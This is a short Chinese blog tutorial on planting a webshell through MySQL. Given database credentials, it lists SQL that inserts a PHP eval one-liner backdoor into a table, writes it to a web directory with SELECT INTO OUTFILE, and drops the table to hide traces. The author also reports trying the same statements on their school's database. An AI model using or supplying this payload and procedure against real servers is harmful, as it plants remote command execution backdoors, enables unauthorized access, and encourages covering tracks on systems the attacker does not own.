【教程】利用MySQL拿webshell

利用MySQL拿webshell


前提:在知道数据库地址、数据库用户名、密码的情况下(先在本地的数据库验证一下想法的可行性)

1.打开任意数据库并创建一个表

create TABLE a (cmd text NOT NULL);
2.插入一句话木马
insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
3.导出一句话木马 (通过phpinfo发现绝对路径)
select cmd from a into outfile '/mnt/sdcard/www/ma.php';

4.执行成功后打开绝对路径查看是否创建了ma.php并查看内容是否为一句话木马

成功插入

5.删除刚刚创建的表(擦屁股走人)

Drop TABLE IF EXISTS a;
但测试很美好实战问题就一大堆了

将刚刚在本地测试的语句中运用到学校数据库,报了1290错误。。。 


完整的数据库语句:


create TABLE a (cmd text NOT NULL);
insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '/mnt/sdcard/www/ma.php';
Drop TABLE IF EXISTS a;


本博客所有文章如无特别注明均为原创。作者:KING复制或转载请以超链接形式注明转自 千世博客
原文地址《【教程】利用MySQL拿webshell
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)